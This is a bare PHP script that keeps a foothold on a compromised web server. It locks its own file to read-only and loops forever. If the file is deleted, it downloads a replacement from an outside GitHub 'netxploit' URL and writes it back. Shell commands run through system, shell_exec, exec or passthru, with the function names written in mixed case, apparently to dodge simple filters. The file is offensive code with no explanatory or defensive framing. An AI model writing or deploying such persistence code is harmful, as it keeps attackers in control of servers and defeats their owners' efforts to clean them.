<?php
    error_reporting();
    error_log(null);
    $file = basename($_SERVER['SCRIPT_NAME']);
    $tempe = "https://raw.githubusercontent.com/bellpwn/netxploit/main/images.php";
    $fileperm = d7net_perm($file);
    d7net_cmd("chmod 444 ".$file);
    while (True) {
        if (!file_exists($file)) {
            $opet = base64_encode(file_get_contents($tempe));
            file_put_contents($file, base64_decode($opet));
        }
        if ($fileperm != "0444"){
            d7net_cmd("chmod 444 ".$file);
        }
    }
    function d7net_cmd($value) {
        if (function_exists("system")) {
            sYsTem($value);
        } else if (function_exists("shell_exec")) {
            return ShEll_eXeC($value);
        } else if (function_exists("exec")) {
            return ExEc($value);
        } else if (function_exists("passthru")) {
            return pAsSThRu($value);
        }
    }
    function d7net_perm($file){
        return substr(sprintf("%o", fileperms($file)), -4);
    }
